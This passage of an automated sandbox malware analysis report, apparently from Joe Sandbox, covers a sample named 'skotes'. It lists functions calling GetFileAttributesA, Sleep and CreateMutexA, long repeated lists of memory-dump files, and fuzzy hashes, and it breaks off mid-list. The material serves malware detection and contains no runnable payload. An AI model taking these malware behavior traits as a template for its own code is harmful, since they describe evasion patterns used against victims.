                                                                                                                                                                    control_flow_graph 2409 619ba5-619bc5 GetFileAttributesA 2412 619bf3-619c0f 2409->2412 2413 619bc7-619bd3 2409->2413 2416 619c11-619c1d 2412->2416 2417 619c3d-619c5c 2412->2417 2414 619bd5-619be3 2413->2414 2415 619be9-619bf0 call 62d663 2413->2415 2414->2415 2418 61a91c 2414->2418 2415->2412 2420 619c33-619c3a call 62d663 2416->2420 2421 619c1f-619c2d 2416->2421 2422 619c8a-61a916 call 6280c0 2417->2422 2423 619c5e-619c6a 2417->2423 2427 61a953-61a987 Sleep CreateMutexA 2418->2427 2428 61a91c call 646c6a 2418->2428 2420->2417 2421->2418 2421->2420 2424 619c80-619c87 call 62d663 2423->2424 2425 619c6c-619c7a 2423->2425 2424->2422 2425->2418 2425->2424 2438 61a98e-61a994 2427->2438 2428->2427 2439 61a9a7-61a9a8 2438->2439 2440 61a996-61a998 2438->2440 2440->2439 2441 61a99a-61a9a5 2440->2441 2441->2439 2443 61a9a9-61a9b0 call 646629 2441->2443
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00619BA8
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: 803b07d4e5284e191b1e3cabdf886241850417843a769e7dafd41622fd342c8f
                                                                                                                                                                    • Instruction ID: dcf1e436183c21edcea75fc76ce938831d8309d1e3d665a051bce3fa08f931f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 803b07d4e5284e191b1e3cabdf886241850417843a769e7dafd41622fd342c8f
                                                                                                                                                                    • Instruction Fuzzy Hash: FE312A31A152048BEB08DBBCEC997EDB773DB81314F288658E064973D6C7759AC08761
                                                                                                                                                                    Function 00619CDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00619CDD
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: 50dfb0dbd777189ac10550221172af91f41535bbb882a4c2dbee7fc52ce1bf35
                                                                                                                                                                    • Instruction ID: 3149ba1102051e2e88be12b6ca191bda4f610f54f5fa12c294b58cee44792317
                                                                                                                                                                    • Opcode Fuzzy Hash: 50dfb0dbd777189ac10550221172af91f41535bbb882a4c2dbee7fc52ce1bf35
                                                                                                                                                                    • Instruction Fuzzy Hash: AA312671A142448BEB08DBB8EC897EDB773DF86310F288658E064AB3D5C7359AC08761
                                                                                                                                                                    Function 00619F44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00619F47
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: c9a30fd2f5802af1fdac59e912bd7ad3bfecb88eaae08c49cbf01899e66c3fe4
                                                                                                                                                                    • Instruction ID: cfdb343cb2628da45c435fd64c6349ad8eb9a399ec1212c2437c06dc4cbac8bc
                                                                                                                                                                    • Opcode Fuzzy Hash: c9a30fd2f5802af1fdac59e912bd7ad3bfecb88eaae08c49cbf01899e66c3fe4
                                                                                                                                                                    • Instruction Fuzzy Hash: F0314A31A111049FEB08DBB8DC887ECB763EB85314F288659E064EB3D5D73599C18762
                                                                                                                                                                    Function 0061A079 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061A07C
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
